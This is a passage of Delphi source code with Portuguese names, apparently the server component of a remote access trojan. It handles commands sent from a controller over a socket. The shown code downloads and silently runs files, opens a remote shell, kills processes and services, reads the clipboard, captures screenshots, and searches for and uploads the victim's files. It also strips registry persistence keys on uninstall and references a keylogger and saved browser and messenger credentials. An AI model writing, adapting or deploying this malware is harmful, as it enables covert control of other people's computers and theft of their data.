'.tmp'; criararquivo(TempFile, '', 0); Mydeletefile(TempFile); until (FindNext(Rec) <> 0) or (result = true); finally _myFindClose(Rec); end; except end; If not InDir then Exit; try if FindFirst(Path + '*.*', faDirectory, Rec) = 0 then try repeat if ((Rec.Attr and faDirectory) <> 0) and (Rec.Name <> '.') and (Rec.Name <> '..') then begin result := FileExistsOnComputer(Path + Rec.Name, FileName, True, ArquivoEncontrado); end; until (FindNext(Rec) <> 0) or (result = true); finally _myFindClose(Rec); end; except end; end; constructor TThreadSearch.Create(pDiretorio, pMascara: string); begin Diretorio := pDiretorio; Mascara := pMascara; end; constructor TThreadDownloadDir.Create(pDiretorio: string); begin Diretorio := pDiretorio; end; function GetDrives2: String; var Drives: array[0..104] of Char; pDrive: PChar; begin GetLogicalDriveStrings(104, Drives); pDrive := Drives; while pDrive^ <> #0 do begin Result := Result + pDrive + '|'; Inc(pDrive, 4); end; end; function CountChars(char, str: string): integer; var i: integer; begin result := 0; if str = '' then exit; if pos(char, str) <= 0 then exit; i := 1; for i := 1 to length(str) do begin if str[i] = char then inc(result, 1); end; end; var xxxArquivo: string; xxxDir: string; procedure EnviarArqDownDir; var TempStr, TempDir, s: string; TempInt: int64; begin TempStr := xxxArquivo; TempDir := xxxDir; TempInt := MyGetFileSize(TempStr); s := extractfilepath(TempStr); if tempdir[length(tempdir)] <> '\' then tempdir := tempdir + '\'; if s[length(s)] <> '\' then s := s + '\'; s := replacestring(TempDir, '', s); while CountChars('\', TempDir) > 1 do delete(TempDir, 1, pos('\', TempDir)); TempDir := TempDir + s; if (fileexists(Tempstr) = true) and (TempInt > 0) and (PossoMexerNoArquivo(Tempstr) = true) then EnviarArquivo(ClientSocket, FILEMANAGER + '|' + DOWNLOADREC + '|' + tempdir + '|' + TempStr + '|', TempStr, TempInt, 0, false); xxxArquivo := ''; end; procedure DownloadDirStart(P: Pointer); var ThreadDownloadDir : TThreadDownloadDir; TempStr, TempStr1, Tosend, ClientDir: string; begin ThreadDownloadDir := TThreadDownloadDir(P); ClientDir := ThreadDownloadDir.Diretorio; FileSearchDownloadDir(ClientDir, TRUE); TempStr := ToDownloadDIR; ToDownloadDIR := ''; if TempStr <> '' then begin While TempStr <> '' do begin TempStr1 := Copy(TempStr, 1, pos('|', TempStr) - 1); delete(TempStr, 1, pos('|', TempStr)); xxxArquivo := TempStr1; xxxDir := ClientDir; StartThread(@EnviarArqDownDir); while xxxArquivo <> '' do sleep(100); end; end; end; procedure ProcurarArquivo(P: Pointer); var ThreadSerarch : TThreadSearch; TempStr, TempStr1, TempStr2, Tosend: string; begin ThreadSerarch := TThreadSearch(P); FileSearch(ThreadSerarch.Diretorio, ThreadSerarch.Mascara, TRUE); TempStr := ToSendSearch; ToSendSearch := ''; if TempStr <> '' then begin ToSend := FILEMANAGER + '|' + PROCURAR_ARQ + '|' + TempStr; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + PROCURARERROR + '|'; _EnviarStream(ClientSocket, ToSend); end; end; function GerarRelatorioConfig: string; var i: integer; begin for i := 0 to 19 do if length(variaveis[i]) > 1 then result := result + variaveis[i] + '|'; result := result + '#'; result := result + GetNewIdentificationName('') + '|'; result := result + senha + '|'; result := result + serverfilename + '|'; result := result + paramstr(0) + '|'; if (HKLM <> '') and (InstalarServidor = true) then result := result + HKLM + '|' else result := result + ' |'; if (HKCU <> '') and (InstalarServidor = true) then result := result + HKCU + '|' else result := result + ' |'; if (UnitSettings.ActiveX <> '') and (InstalarServidor = true) then result := result + UnitSettings.ActiveX + '|' else result := result + ' |'; if (Policies <> '') and (InstalarServidor = true) then result := result + Policies + '|' else result := result + ' |'; result := result + variaveis[59] + '|'; result := result + variaveis[60] + '|'; result := result + variaveis[61] + '|'; result := result + variaveis[63] + '|'; result := result + MutexName + '|'; if ExibirMensagem = true then begin result := result + variaveis[33] + ' |'; result := result + variaveis[34] + ' |'; end else begin result := result + ' |'; result := result + ' |'; end; result := result + variaveis[35] + '|'; result := result + variaveis[37] + '|'; if (keyloggerativo = false) or (EnviarPorFTP = false) then begin result := result + ' |'; result := result + ' |'; result := result + ' |'; result := result + ' |'; result := result + ' |'; result := result + ' |'; end else begin result := result + variaveis[38] + '|'; result := result + variaveis[39] + '|'; result := result + variaveis[41] + '|'; result := result + variaveis[42] + '|'; result := result + variaveis[43] + '|'; result := result + variaveis[44] + '|'; end; result := result + variaveis[45] + '|'; result := result + variaveis[46] + '|'; result := result + variaveis[47] + '|'; result := result + variaveis[48] + '|'; result := result + variaveis[49] + '|'; result := result + variaveis[50] + '|'; result := result + variaveis[51] + '|'; result := result + variaveis[52] + '|'; result := result + variaveis[53] + '|'; result := result + variaveis[54] + '|'; result := result + variaveis[55] + '|'; result := result + variaveis[56] + '|'; result := result + variaveis[70] + '|'; if variaveis[71] <> '' then result := result + variaveis[71] + '|' else result := result + ' |'; if variaveis[72] <> '' then result := result + 'TRUE' + '|' else result := result + 'FALSE' + '|'; end; function GetNewIdentificationName(NewName: string): string; var tempstr: string; begin if NewName <> '' then begin if Write2Reg(HKEY_CURRENT_USER, 'SOFTWARE\' + Identificacao, 'NewIdentification', NewName) = true then result := NewName else result := Identificacao; exit; end; result := lerreg(HKEY_CURRENT_USER, pchar('SOFTWARE\' + Identificacao), pchar('NewIdentification'), ''); if result = '' then begin tempstr := getday + '/' + getmonth + '/' + getyear + ' -- ' + gethour + ':' + GetMinute; Write2Reg(HKEY_CURRENT_USER, 'SOFTWARE\' + Identificacao, 'NewIdentification', Identificacao); end; end; procedure DesinstalarServer; var InstallKey: HKEY; TempMutex: THandle; begin ExitMutex := CreateMutex(nil, False, pchar(MutexName + '_SAIR')); if ShellThreadID <> 0 then begin ShellGetComando('exit'); sleep(100); ShellGetComando(''); //closethread(ShellThreadID); ShellThreadID := 0; end; CloseHandle(KeyloggerThread); CloseHandle(MainMutex); SetFileAttributes(PChar(extractfilepath(ServerFileName)), FILE_ATTRIBUTE_NORMAL); MyDeleteFile(LogsFile); if HKLM <> '' then begin regopenkey(HKEY_LOCAL_MACHINE, CurrentVersion, InstallKey); RegDeleteValue(InstallKey, pchar(HKLM)); regclosekey(InstallKey); end; if HKCU <> '' then begin regopenkey(HKEY_CURRENT_USER, CurrentVersion, InstallKey); RegDeleteValue(InstallKey, pchar(HKCU)); regclosekey(InstallKey); end; if Policies <> '' then begin regopenkey(HKEY_CURRENT_USER, PoliciesKey, InstallKey); RegDeleteValue(InstallKey, pchar(Policies)); regclosekey(InstallKey); regopenkey(HKEY_LOCAL_MACHINE, PoliciesKey, InstallKey); RegDeleteValue(InstallKey, pchar(Policies)); regclosekey(InstallKey); end; if UnitSettings.activeX <> '' then begin RegOpenKeyEx(HKEY_LOCAL_MACHINE, InstalledComp, 0, KEY_WRITE, InstallKey); RegDeleteKey(InstallKey, pchar(UnitSettings.activeX)); RegCloseKey(InstallKey); RegOpenKeyEx(HKEY_CURRENT_USER, InstalledComp, 0, KEY_WRITE, InstallKey); RegDeleteKey(InstallKey, pchar(UnitSettings.activeX)); RegCloseKey(InstallKey); end; RegOpenKeyEx(HKEY_CURRENT_USER, 'Software\', 0, KEY_WRITE, InstallKey); RegDeleteKey(InstallKey, pchar(Identificacao)); RegCloseKey(InstallKey); end; procedure SendShift(H: HWnd; Down: Boolean); var vKey, ScanCode, wParam: Word; lParam: longint; begin vKey := $10; ScanCode := MapVirtualKey(vKey, 0); wParam := vKey or ScanCode shl 8; lParam := longint(ScanCode) shl 16 or 1; if not(Down) then lParam := lParam or $C0000000; SendMessage(H, WM_KEYDOWN, vKey, lParam); end; procedure SendCtrl(H: HWnd; Down: Boolean); var vKey, ScanCode, wParam: Word; lParam: longint; begin vKey := $11; ScanCode := MapVirtualKey(vKey, 0); wParam := vKey or ScanCode shl 8; lParam := longint(ScanCode) shl 16 or 1; if not(Down) then lParam := lParam or $C0000000; SendMessage(H, WM_KEYDOWN, vKey, lParam); end; procedure SendKey(H: Hwnd; Key: char); var vKey, ScanCode, wParam: Word; lParam, ConvKey: longint; Shift, Ctrl: boolean; begin ConvKey := OemKeyScan(ord(Key)); Shift := (ConvKey and $00020000) <> 0; Ctrl := (ConvKey and $00040000) <> 0; ScanCode := ConvKey and $000000FF or $FF00; vKey := ord(Key); wParam := vKey; lParam := longint(ScanCode) shl 16 or 1; if Shift then SendShift(H, true); if Ctrl then SendCtrl(H, true); SendMessage(H, WM_KEYDOWN, vKey, lParam); SendMessage(H, WM_CHAR, vKey, lParam); lParam := lParam or $C0000000; SendMessage(H, WM_KEYUP, vKey, lParam); if Shift then SendShift(H, false); if Ctrl then SendCtrl(H, false); end; procedure sendkeys(recebido: string); var KeyBoard: byte; begin while pos('|', recebido) > 0 do begin KeyBoard := strtoint(copy(recebido, 1, pos('|', recebido) -1)); delete(recebido, 1, pos('|', recebido)); keybd_event(KeyBoard, 1, 0, 0); keybd_event(KeyBoard, 1, KEYEVENTF_KEYUP, 0); end; end; procedure ExecutarComando; var ToSend: string; Comando: string; CommandThreadId: THandle; ThreadId: cardinal; PID: cardinal; TempStr, TempStr1, TempStr2, TempStr3, TempStr4, tempstr5, tempstr6: string; TempInt64, TempInt, TempInt2: int64; DeviceClassesCount, DevicesCount: integer; NumArrayRegistro: string; EixoX, EixoY: integer; DC1: HDC; Point: TPoint; MouseButton: dword; DC: HDC; delay: integer; Key: char; Msg: TMsg; ThreadInfoAudio: TThreadInfoAudio; ThreadSearch: TThreadSearch; ThreadDownloadDir: TThreadDownloadDir; DeletouArq, DeletouDir: boolean; MSN, FIREFOX, IELOGIN, IEPASS, IEAUTO, IEWEB, NOIP, FF3_5, STEAM, CHROME: string; c: cardinal; TempMutex: cardinal; i: integer; H: THandle; TempFile: string; Tentativa: integer; begin //TempFile := mytempfolder + inttostr(gettickcount) + '.tmp'; //criararquivo(TempFile, '', 0); //Mydeletefile(TempFile); processmessages; Comando := ComandoRecebido; CommandThreadId := MasterCommandThreadId; while gettickcount < LastCommand + 2 do processmessages; LastCommand := Gettickcount; LastPing := gettickcount; if copy(Comando, 1, pos('|', Comando) - 1) = MAININFO then begin delete(comando, 1, pos('|', Comando)); if copy(Comando, 1, pos('|', Comando) - 1) <> senha then begin ClientSocket.Disconnect(erro17); AddDebug(erro3); CloseHandle(CommandThreadId); exit; end; delete(comando, 1, pos('|', Comando)); RandomStringClient := copy(Comando, 1, pos('|', Comando) - 1); if NewIdentification = '' then NewIdentification := Identificacao; ToSend := ListarMAININFO(NewIdentification, ClientSocket.LocalAddress, Versao, inttostr(ClientSocket.RemotePort), GetFirstExecution); MainInfoBuffer := ToSend; _EnviarStream(ClientSocket, ToSend + GerarRelatorioConfig); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = IMGDESK then begin // aqui no futuro eu posso implementar para o cliente escolher o tamanho da imagem ToSend := GetDesktopImage(90, 130, 130); _EnviarStream(ClientSocket, IMGDESK + '|' + ToSend); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DISCONNECT then begin ExitMutex := CreateMutex(nil, False, pchar(MutexName + '_SAIR')); CloseHandle(MainMutex); ClientSocket.Disconnect(erro18); AddDebug(erro4); GetWindowThreadProcessId(FindWindow('shell_traywnd', nil), @PID); if PID <> getcurrentprocessid then begin sleep(10000); exitprocess(0); end else begin FinalizarServidor := true; sleep(10000); // tempo para todos os processos verificarem o mutex_sair // aqui eu preciso fachar o handle pq o processo não será finalizado CloseHandle(ExitMutex); exit; end; end else if copy(Comando, 1, pos('|', Comando) - 1) = UNINSTALL then begin DesinstalarServer; ClientSocket.Disconnect(erro19); AddDebug(erro5); GetWindowThreadProcessId(FindWindow('shell_traywnd', nil), @PID); if PID <> getcurrentprocessid then begin if paramstr(0) <> ServerFileName then MyDeleteFile(ServerFileName) else DeletarSe; sleep(10000); exitprocess(0); end else begin if paramstr(0) <> ServerFileName then MyDeleteFile(ServerFileName) else DeletarSe; FinalizarServidor := true; sleep(10000); // tempo para todos os processos verificarem o mutex_sair // aqui eu preciso fachar o handle pq o processo não será finalizado CloseHandle(ExitMutex); exit; end; end else if copy(Comando, 1, pos('|', Comando) - 1) = RENAMESERVIDOR then begin delete(comando, 1, pos('|', Comando)); NewIdentification := copy(Comando, 1, pos('|', Comando) - 1); NewIdentification := GetNewIdentificationName(NewIdentification); _EnviarStream(ClientSocket, RENAMESERVIDOR + '|' + NewIdentification + '|'); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = UPDATESERVIDOR then begin TempStr := copy(Comando, 1, pos('|', Comando) - 1); delete(comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(comando, 1, pos('|', Comando)); TempStr2 := MyTempFolder + inttostr(gettickcount) + '_' + ExtractFileName(TempStr1); if ReceberArquivo(ClientSocket, TempStr + '|' + TempStr1 + '|', TempStr2) then begin if fileexists(TempStr2) = false then begin _EnviarStream(ClientSocket, UPDATESERVERERROR + '|'); exit; end; TempMutex := CreateMutex(nil, False, '_x_X_UPDATE_X_x_'); if MyShellExecute(0, 'open', pchar(TempStr2), nil, nil, SW_NORMAL) <= 32 then begin closehandle(TempMutex); _EnviarStream(ClientSocket, UPDATESERVERERROR + '|'); exit; end; sleep(1000); closehandle(TempMutex); DesinstalarServer; ClientSocket.Disconnect(erro20); AddDebug(erro6); GetWindowThreadProcessId(FindWindow('shell_traywnd', nil), @PID); if PID <> getcurrentprocessid then begin if paramstr(0) <> ServerFileName then MyDeleteFile(ServerFileName) else DeletarSe; sleep(10000); exitprocess(0); end else begin if paramstr(0) <> ServerFileName then MyDeleteFile(ServerFileName) else DeletarSe; FinalizarServidor := true; sleep(10000); // tempo para todos os processos verificarem o mutex_sair // aqui eu preciso fachar o handle pq o processo não será finalizado CloseHandle(ExitMutex); exit; end; end; end else if (copy(Comando, 1, pos('|', Comando) - 1) = ENVIAREXECNORMAL) or (copy(Comando, 1, pos('|', Comando) - 1) = ENVIAREXECHIDDEN) then begin TempStr := copy(Comando, 1, pos('|', Comando) - 1); delete(comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(comando, 1, pos('|', Comando)); TempStr2 := MyTempFolder + inttostr(gettickcount) + '_' + ExtractFileName(TempStr1); if ReceberArquivo(ClientSocket, TempStr + '|' + TempStr1 + '|', TempStr2) then begin if TempStr = ENVIAREXECNORMAL then MyShellExecute(0, 'open', pchar(TempStr2), '', nil, SW_NORMAL) else MyShellExecute(0, 'open', pchar(TempStr2), '', nil, SW_HIDE); end; end else if copy(Comando, 1, pos('|', Comando) - 1) = LISTARPROCESSOS then begin _EnviarStream(ClientSocket, LISTARPROCESSOS + '|' + LISTADEPROCESSOSPRONTA + '|' + inttostr(GetCurrentProcessId) + '|' + ListaDeProcessos); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = FINALIZARPROCESSO then begin delete(comando, 1, pos('|', Comando)); try TempInt := StrToInt(copy(Comando, 1, pos('|', Comando) - 1)); except end; if TerminarProceso(TempInt) = true then _EnviarStream(ClientSocket, LISTARPROCESSOS + '|' + FINALIZARPROCESSO + '|' + 'Y|' + inttostr(TempInt) + '|') else _EnviarStream(ClientSocket, LISTARPROCESSOS + '|' + FINALIZARPROCESSO + '|' + 'N|' + inttostr(TempInt) + '|'); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = LISTARSERVICOS then begin _EnviarStream(ClientSocket, LISTARSERVICOS + '|' + LISTADESERVICOSPRONTA + '|' + ServiceList); end else if copy(Comando, 1, pos('|', Comando) - 1) = INICIARSERVICO then begin Delete(Comando, 1, pos('|', Comando)); ServiceStatus(copy(Comando, 1, pos('|', Comando) - 1), True, True); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = PARARSERVICO then begin Delete(Comando, 1, pos('|', Comando)); ServiceStatus(copy(Comando, 1, pos('|', Comando) - 1), True, False); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESINSTALARSERVICO then begin Delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); if UninstallService(TempStr) = true then begin _EnviarStream(ClientSocket, LISTARSERVICOS + '|' + DESINSTALARSERVICO + '|' + 'Y|' + TempStr + '|'); end else begin _EnviarStream(ClientSocket, LISTARSERVICOS + '|' + DESINSTALARSERVICO + '|' + 'N|' + TempStr + '|'); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = INSTALARSERVICO then begin Delete(Comando, 1, pos('|', Comando)); TempStr := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, Pos('|', Comando)); TempStr1 := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, Pos('|', Comando)); TempStr2 := Copy(Comando, 1, Pos('|', Comando) - 1); if InstallService(pchar(TempStr), pchar(TempStr1), TempStr2) = true then begin _EnviarStream(ClientSocket, LISTARSERVICOS + '|' + INSTALARSERVICO + '|' + 'Y|' + TempStr + '|'); end else begin _EnviarStream(ClientSocket, LISTARSERVICOS + '|' + INSTALARSERVICO + '|' + 'N|' + TempStr + '|'); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = LISTARJANELAS then begin TempStr2 := ''; TempStr := WindowsList; while TempStr <> '' do begin TempStr1 := copy(TempStr, 1, pos('|', TempStr) - 1); delete(TempStr, 1, pos('|', TempStr)); TempInt := StrToInt(copy(TempStr, 1, pos('|', TempStr) - 1)); delete(TempStr, 1, pos('|', TempStr)); TempStr2 := TempStr2 + TempStr1 + '|' + inttostr(TempInt) + '|' + GetProcessNameFromWnd(TempInt) + '|'; end; if TempStr2 <> '' then _EnviarStream(ClientSocket, LISTARJANELAS + '|' + LISTADEJANELASPRONTA + '|' + TempStr2) else _EnviarStream(ClientSocket, LISTARJANELAS + '|' + LISTADEJANELASPRONTA + '|' + 'XXX'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = WINDOWS_FECHAR then begin Delete(Comando, 1, pos('|', Comando)); TempInt := StrToInt(copy(Comando, 1, pos('|', Comando) - 1)); FecharJanela(TempInt); _EnviarStream(ClientSocket, LISTARJANELAS + '|' + WINDOWS_FECHAR + '|' + inttostr(TempInt) + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = WINDOWS_MAX then begin Delete(Comando, 1, pos('|', Comando)); TempInt := StrToInt(copy(Comando, 1, pos('|', Comando) - 1)); MaximizarJanela(TempInt); _EnviarStream(ClientSocket, LISTARJANELAS + '|' + WINDOWS_MAX + '|' + inttostr(TempInt) + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = WINDOWS_MIN then begin Delete(Comando, 1, pos('|', Comando)); TempInt := StrToInt(copy(Comando, 1, pos('|', Comando) - 1)); MinimizarJanela(TempInt); _EnviarStream(ClientSocket, LISTARJANELAS + '|' + WINDOWS_MIN + '|' + inttostr(TempInt) + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = WINDOWS_MOSTRAR then begin Delete(Comando, 1, pos('|', Comando)); TempInt := StrToInt(copy(Comando, 1, pos('|', Comando) - 1)); MostrarJanela(TempInt); _EnviarStream(ClientSocket, LISTARJANELAS + '|' + WINDOWS_MOSTRAR + '|' + inttostr(TempInt) + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = WINDOWS_OCULTAR then begin Delete(Comando, 1, pos('|', Comando)); TempInt := StrToInt(copy(Comando, 1, pos('|', Comando) - 1)); OcultarJanela(TempInt); _EnviarStream(ClientSocket, LISTARJANELAS + '|' + WINDOWS_OCULTAR + '|' + inttostr(TempInt) + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = WINDOWS_MIN_TODAS then begin Delete(Comando, 1, pos('|', Comando)); TempInt := StrToInt(copy(Comando, 1, pos('|', Comando) - 1)); MinimizarTodas; _EnviarStream(ClientSocket, LISTARJANELAS + '|' + WINDOWS_MIN_TODAS + '|' + inttostr(TempInt) + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = WINDOWS_CAPTION then begin Delete(Comando, 1, pos('|', Comando)); tempstr := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); if SetWindowText(strtoint(tempstr) ,PChar(copy(Comando, 1, pos('|', Comando) - 1))) = true then begin _EnviarStream(ClientSocket, LISTARJANELAS + '|' + WINDOWS_CAPTION + '|' + tempstr + '|' + copy(Comando, 1, pos('|', Comando) - 1) + '|'); end else begin _EnviarStream(ClientSocket, LISTARJANELAS + '|' + WINDOWS_CAPTION + '|' + tempstr + '|' + 'N|'); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DISABLE_CLOSE then begin Delete(Comando, 1, pos('|', Comando)); TempInt := StrToInt(copy(Comando, 1, pos('|', Comando) - 1)); DesabilitarClose(TempInt); _EnviarStream(ClientSocket, LISTARJANELAS + '|' + DISABLE_CLOSE + '|' + inttostr(TempInt) + '|'); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = ENABLE_CLOSE then begin Delete(Comando, 1, pos('|', Comando)); TempInt := StrToInt(copy(Comando, 1, pos('|', Comando) - 1)); HabilitarClose(TempInt); _EnviarStream(ClientSocket, LISTARJANELAS + '|' + ENABLE_CLOSE + '|' + inttostr(TempInt) + '|'); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = LISTARPROGRAMASINSTALADOS then begin tempstr := ListarApp('HKEY_LOCAL_MACHINE\' + UNINST_PATH); _EnviarStream(ClientSocket, LISTARPROGRAMASINSTALADOS + '|' + LISTADEPROGRAMASINSTALADOSPRONTA + '|' + TempStr + '|'); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESINSTALARPROGRAMA then begin delete(Comando, 1, pos('|', Comando)); tempstr := copy(Comando, 1, pos('|', Comando) - 1); //myShellExecute(0, 'open', pchar(tempstr), nil, nil, SW_HIDE); winexec(pchar(tempstr), sw_hide); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = LISTARPORTAS then begin CarregarDllActivePort; TempStr := CriarLista(false); //LiberarDllActivePort; _EnviarStream(ClientSocket, LISTARPORTAS + '|' + LISTADEPORTASPRONTA + '|' + TempStr + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = LISTARPORTASDNS then begin CarregarDllActivePort; TempStr := CriarLista(true); //LiberarDllActivePort; _EnviarStream(ClientSocket, LISTARPORTAS + '|' + LISTADEPORTASPRONTA + '|' + TempStr + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = FINALIZARCONEXAO then begin CarregarDllActivePort; delete(Comando, 1, pos('|', Comando)); tempstr := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); tempstr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); tempstr2 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); tempstr3 := copy(Comando, 1, pos('|', Comando) - 1); if CloseTcpConnect(tempstr, tempstr2, strtoint(tempstr1), strtoint(tempstr3)) = true then begin //LiberarDllActivePort; _EnviarStream(ClientSocket, LISTARPORTAS + '|' + FINALIZARCONEXAO + '|' + tempstr + '|' + tempstr2 + '|' + 'TRUE' + '|'); end else begin //LiberarDllActivePort; _EnviarStream(ClientSocket, LISTARPORTAS + '|' + FINALIZARCONEXAO + '|' + tempstr + '|' + tempstr2 + '|' + 'FALSE' + '|'); end; CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = FINALIZARPROCESSOPORTAS then begin delete(comando, 1, pos('|', Comando)); try TempInt := StrToInt(copy(Comando, 1, pos('|', Comando) - 1)); except end; if TerminarProceso(TempInt) = true then _EnviarStream(ClientSocket, LISTARPORTAS + '|' + FINALIZARPROCESSOPORTAS + '|' + 'Y|' + inttostr(TempInt) + '|') else _EnviarStream(ClientSocket, LISTARPORTAS + '|' + FINALIZARPROCESSOPORTAS + '|' + 'N|' + inttostr(TempInt) + '|'); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = LISTDEVICES then begin TempStr := FillDeviceList(DeviceClassesCount, DevicesCount); _EnviarStream(ClientSocket, LISTDEVICES + '|' + LISTADEDISPOSITIVOSPRONTA + '|' + inttostr(DeviceClassesCount) + '|' + inttostr(DevicesCount) + '|' + TempStr); end else if copy(Comando, 1, pos('|', Comando) - 1) = LISTEXTRADEVICES then begin delete(Comando, 1, pos('|', Comando)); TempStr := ShowDeviceAdvancedInfo(strtoint(copy(Comando, 1, pos('|', Comando) - 1))); _EnviarStream(ClientSocket, LISTEXTRADEVICES + '|' + LISTADEDISPOSITIVOSEXTRASPRONTA + '|' + TempStr); end else if copy(Comando, 1, pos('|', Comando) - 1) = CONFIGURACOESDOSERVER then begin TempStr := GerarRelatorioConfig; _EnviarStream(ClientSocket, CONFIGURACOESDOSERVER + '|' + CONFIGURACOESDOSERVER + '|' + TempStr); end else if copy(Comando, 1, pos('|', Comando) - 1) = EXECUTARCOMANDOS then begin delete(Comando, 1, pos('|', Comando)); tempstr := copy(Comando, 1, pos('|', Comando) - 1); tempstr1 := ''; if pos(' ', tempstr) > 1 then begin tempstr1 := tempstr; tempstr := copy(tempstr1, 1, pos(' ', tempstr1) - 1); delete(tempstr1, 1, pos(' ', tempstr1)); end; ExecuteCommand(tempstr, tempstr1, sw_normal); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = OPENWEB then begin Delete(Comando, 1, pos('|', Comando)); tempstr := copy(Comando, 1, pos('|', Comando) - 1); try Myshellexecute(0, 'open', pchar(getdefaultbrowser), pchar(tempstr), '', SW_SHOWMAXIMIZED); except end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DOWNEXEC then begin Delete(Comando, 1, pos('|', Comando)); tempstr3 := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); tempstr1 := copy(Comando, 1, pos('|', Comando) - 1); tempstr2 := mytempfolder + extractfilename(tempstr1); try MyURLDownloadToFile(nil, pchar(tempstr1), pchar(tempstr2), 0, nil); if tempstr3 = 'Y' then Myshellexecute(0, 'open', pchar(tempstr2), nil, pchar(mytempfolder), sw_hide) else Myshellexecute(0, 'open', pchar(tempstr2), nil, pchar(mytempfolder), sw_normal); except end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = OBTERCLIPBOARD then begin if GetClipboardText(0, TempStr) = true then begin _EnviarStream(ClientSocket, OBTERCLIPBOARD + '|' + OBTERCLIPBOARD + '|' + TempStr); end else if GetClipboardFiles(TempStr) = true then begin _EnviarStream(ClientSocket, OBTERCLIPBOARD + '|' + OBTERCLIPBOARDFILES + '|' + TempStr); end else _EnviarStream(ClientSocket, OBTERCLIPBOARD + '|' + OBTERCLIPBOARD + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DEFINIRCLIPBOARD then begin try OpenClipboard(0); EmptyClipboard; finally CloseClipboard; end; Delete(Comando, 1, pos('|', Comando)); SetClipboardText(Comando); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = LIMPARCLIPBOARD then begin try OpenClipboard(0); EmptyClipboard; finally CloseClipboard; end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = SHELLATIVAR then begin if ShellThreadID <> 0 then begin ShellGetComando('exit'); sleep(100); ShellGetComando(''); //closethread(ShellThreadID); ShellThreadID := 0; end; ShellGetVariaveis(RandomStringClient, ClientSocket.RemoteAddress, senha, ClientSocket.RemotePort); ShellThreadID := CommandThreadId; ShellThread; end else if copy(Comando, 1, pos('|', Comando) - 1) = SHELLDESATIVAR then begin if ShellThreadID <> 0 then begin ShellGetComando('exit'); sleep(100); ShellGetComando(''); //closethread(ShellThreadID); ShellThreadID := 0; _EnviarStream(ClientSocket, SHELLRESPOSTA + '|' + SHELLDESATIVAR + '|'); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = SHELLRESPOSTA then begin Delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); ShellGetComando(TempStr); if upperstring(TempStr) = 'EXIT' then begin sleep(100); ShellGetComando(''); _EnviarStream(ClientSocket, SHELLRESPOSTA + '|' + SHELLDESATIVAR + '|'); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = LISTARCHAVES then begin if ListarChavesRegistro <> 0 then closethread(ListarChavesRegistro); ListarChavesRegistro := CommandThreadId; Delete(Comando, 1, pos('|', Comando)); NumArrayRegistro := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); Comando := copy(Comando, 1, pos('|', Comando) - 1); TempStr := ListarClaves(Comando); ToSend := REGISTRO + '|' + LISTARCHAVES + '|' + NumArrayRegistro + '|' + TempStr; _EnviarStream(ClientSocket, ToSend); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = UnitComandos.LISTARVALORES then begin if ListarValoresRegistro <> 0 then closethread(ListarValoresRegistro); ListarValoresRegistro := CommandThreadId; Delete(Comando, 1, pos('|', Comando)); Comando := copy(Comando, 1, pos('|', Comando) - 1); ToSend := REGISTRO + '|' + UnitComandos.LISTARVALORES + '|' + ListarValores(Comando); _EnviarStream(ClientSocket, ToSend); 